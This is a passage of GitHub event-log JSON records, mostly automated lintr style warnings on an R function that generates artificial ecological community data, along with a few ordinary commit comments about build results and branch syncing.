= 0, sd = 1) * \n                                                           ~^~\n```\n[R/generateArtificialData.R:34:68:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L34) *style:* **Trailing whitespace is superfluous.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n                                                                   ^\n```\n[R/generateArtificialData.R:35:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_communities) {\n^\n```\n[R/generateArtificialData.R:35:37:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L35) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t                            (sd_richness * pool_richness) +\n                                    ^\n```\n[R/generateArtificialData.R:35:50:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\t                            (sd_richness * pool_richness) +\n                                                ~^~\n```\n[R/generateArtificialData.R:36:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  if(mechanism_random == TRUE){\n^\n```\n[R/generateArtificialData.R:37:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L37) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:37:47:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                             ~^~\n```\n[R/generateArtificialData.R:37:65:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                                               ~^~~\n```\n[R/generateArtificialData.R:38:47:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L38) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n                                             ~^\n```\n[R/generateArtificialData.R:39:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  } else {\n^\n```\n[R/generateArtificialData.R:39:12:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L39) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_communities) {\n           ^\n```\n[R/generateArtificialData.R:40:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n^\n```\n[R/generateArtificialData.R:40:13:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L40) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  if(mechanism_random == TRUE){\n            ^\n```\n[R/generateArtificialData.R:40:31:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L40) *style:* **Put spaces around all infix operators.**\n```r\n​\t  if(mechanism_random == TRUE){\n                             ~^~~\n```\n[R/generateArtificialData.R:41:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- c()\n^\n```\n[R/generateArtificialData.R:41:29:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for (j in 1:n_traits) {\n^\n```\n[R/generateArtificialData.R:43:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L43) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      for (k in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n^~\n```\n[R/generateArtificialData.R:44:24:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L44) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                      ~^~~\n```\n[R/generateArtificialData.R:44:48:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L44) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                                              ~^~\n```\n[R/generateArtificialData.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n^~\n```\n[R/generateArtificialData.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      }\n^\n```\n[R/generateArtificialData.R:46:17:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for (j in 1:n_traits) {\n                ^\n```\n[R/generateArtificialData.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:47:19:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L47) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      for (k in 1:pool_richness) {\n                  ^\n```\n[R/generateArtificialData.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n^\n```\n[R/generateArtificialData.R:48:25:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                       ~^~~\n```\n[R/generateArtificialData.R:48:28:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L48) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                           ^\n```\n[R/generateArtificialData.R:48:31:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                             ~^~\n```\n[R/generateArtificialData.R:48:36:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                                  ~^\n```\n[R/generateArtificialData.R:49:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n^\n```\n[R/generateArtificialData.R:49:44:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n                                          ~^~~\n```\n[R/generateArtificialData.R:50:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    trait_distances_onedimen <- c()\n^\n```\n[R/generateArtificialData.R:51:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(m in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:52:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * \n^\n```\n[R/generateArtificialData.R:52:31:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L52) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                             ~^~~\n```\n[R/generateArtificialData.R:52:65:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L52) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                                                               ~^~\n```\n[R/generateArtificialData.R:53:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L53) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                              traits_distances[m, ]))\n^\n```\n[R/generateArtificialData.R:53:30:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L53) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                            ~^~~\n```\n[R/generateArtificialData.R:53:49:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L53) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                                               ~^~\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L54) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:55:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L55) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - \n^\n```\n[R/generateArtificialData.R:55:16:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L55) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(m in 1:pool_richness){\n               ^\n```\n[R/generateArtificialData.R:56:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L56) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       max(trait_distances_onedimen)) + 10 ^ -99\n^\n```\n[R/generateArtificialData.R:56:43:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * \n                                         ~^~~\n```\n[R/generateArtificialData.R:56:71:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L56) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * \n                                                                      ^\n```\n[R/generateArtificialData.R:57:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L57) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:59:27:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L59) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - \n                         ~^~~\n```\n[R/generateArtificialData.R:59:31:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L59) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - \n                              ^\n```\n[R/generateArtificialData.R:59:51:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L59) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - \n                                                  ^\n```\n[R/generateArtificialData.R:60:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L60) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  comm_spec_matrix[i, c(present_species)] <- 1\n^\n```\n[R/generateArtificialData.R:60:63:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       max(trait_distances_onedimen)) + 10 ^ -99\n                                                              ^~\n```\n[R/generateArtificialData.R:61:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L61) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:61:29:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L61) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:62:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L62) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix\n^\n```\n[R/generateArtificialData.R:63:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L63) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) {\n^\n```\n[R/generateArtificialData.R:64:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L64) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  traits_pool_df <-\n^\n```\n[R/generateArtificialData.R:66:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L66) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:67:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L67) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n^\n```\n[R/generateArtificialData.R:67:11:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L67) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) {\n          ^\n```\n[R/generateArtificialData.R:67:58:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L67) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) {\n                                                        ~^~~\n```\n[R/generateArtificialData.R:68:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L68) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) { \n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L69) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  comm_spec_matrix <-\n^\n```\n[R/generateArtificialData.R:71:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L71) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:71:14:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n            ~^~~\n```\n[R/generateArtificialData.R:71:62:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n                                                            ~^~~\n```\n[R/generateArtificialData.R:72:11:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L72) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) { \n          ^\n```\n[R/generateArtificialData.R:72:58:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L72) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) { \n                                                        ~^\n```\n[R/generateArtificialData.R:72:58:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L72) *style:* **Trailing whitespace is superfluous.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) { \n                                                         ^\n```\n[R/generateArtificialData.R:73:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L73) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(\n^\n```\n[R/generateArtificialData.R:74:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L74) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                      cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^\n```\n[R/generateArtificialData.R:75:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L75) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n^\n```\n[R/generateArtificialData.R:77:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L77) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tplots <- as.data.frame(matrix(\n^\n```\n[R/generateArtificialData.R:77:26:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(\n                        ~^~~\n```\n[R/generateArtificialData.R:78:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L78) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t            as.numeric(as.matrix(comm_spec_matrix[,-ncol(comm_spec_matrix)])),\n^\n```\n[R/generateArtificialData.R:79:33:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n                               ~^~~\n```\n[R/generateArtificialData.R:81:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L81) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n^\n```\n[R/generateArtificialData.R:81:15:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L81) *style:* **Put spaces around all infix operators.**\n```r\n​\tplots <- as.data.frame(matrix(\n             ~^~~\n```\n[R/generateArtificialData.R:83:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L83) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df[ ,c(2:ncol(traits_pool_df))] <- as.matrix(\n^\n```\n[R/generateArtificialData.R:84:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L84) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                traits_pool_df[ ,c(2:ncol(traits_pool_df))])\n^\n```\n[R/generateArtificialData.R:85:22:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L85) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n                    ~^~~\n```\n[R/generateArtificialData.R:86:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L86) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor (i in 2:ncol(traits_pool_df)) {\n^\n```\n[R/generateArtificialData.R:87:53:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df[ ,c(2:ncol(traits_pool_df))] <- as.matrix(\n                                                   ~^~~\n```\n[R/generateArtificialData.R:88:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L88) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:89:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L89) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toutput <- list( traits = traits_pool_df, abundances = plots)\n^\n```\n[R/generateArtificialData.R:90:13:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L90) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor (i in 2:ncol(traits_pool_df)) {\n            ^\n```\n[R/generateArtificialData.R:91:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L91) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\treturn(output)\n^\n```\n"}},"created_at":"2016-09-21T17:56:25Z"}
{"id":"4597898604","type":"CommitCommentEvent","actor":{"login":"BadiBasso"},"repo":{"name":"mtaheij/PoGo-UWP"},"payload":{"comment":{"id":19117876,"position":null,"line":null,"path":null,"commit_id":"f853b5e02e449acf09b1bb2ae9ff85f0beaa15a0","created_at":"2016-09-21T17:58:34Z","updated_at":"2016-09-21T17:58:34Z","body":"@mtaheij Didn't notice this earlier. Any stuff related to Spawnpoint is not relevant. Spawnpoints are some unknown objects I discovered earlier and coded them to be visible in another local branch. Somehow parts of that code got to my GIT incense branch as I  still have a lot to learn about syncing. Sorry :("}},"created_at":"2016-09-21T17:58:34Z"}
{"id":"4597904655","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19117899,"position":null,"line":null,"path":null,"commit_id":"6200029faae23710fa88638269e9272664509b91","created_at":"2016-09-21T17:59:40Z","updated_at":"2016-09-21T17:59:40Z","body":"Also see [Issue 264: Clang 3.3, i686 and \"error: unknown use of instruction mnemonic without a size suffix\"](http://github.com/weidai11/cryptopp/issues/264)."}},"created_at":"2016-09-21T17:59:40Z"}
{"id":"4597905103","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19117902,"position":null,"line":null,"path":null,"commit_id":"6ac19ea356df9fa833c65a19322ea952816ecb6f","created_at":"2016-09-21T17:59:44Z","updated_at":"2016-09-21T17:59:44Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2294 of 2480 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6ac19ea356df9fa833c65a19322ea952816ecb6f-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6ac19ea356df9fa833c65a19322ea952816ecb6f-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.5%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T17:59:44Z"}
{"id":"4597905901","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"seninp-bioinfo/MetaComp"},"payload":{"comment":{"id":19117906,"position":null,"line":null,"path":null,"commit_id":"097b747e3a2d60fd6f4fbc59b42b7144a33cbee0","created_at":"2016-09-21T17:59:53Z","updated_at":"2016-09-21T17:59:53Z","body":"[R/convert_merge_table_to_phyloseq_otu_table.R:17:1:](https://github.com/seninp-bioinfo/MetaComp/blob/097b747e3a2d60fd6f4fbc59b42b7144a33cbee0/R/convert_merge_table_to_phyloseq_otu_table.R#L17) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​convert_merge_table_to_phyloseq_otu_table <- function(filepath, TAXON){\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R:4:8:](https://github.com/seninp-bioinfo/MetaComp/blob/097b747e3a2d60fd6f4fbc59b42b7144a33cbee0/tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R#L4) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​dat <- convert_merge_table_to_phyloseq_otu_table(\"../test_data/merged_table.tsv\", \"class\")\n       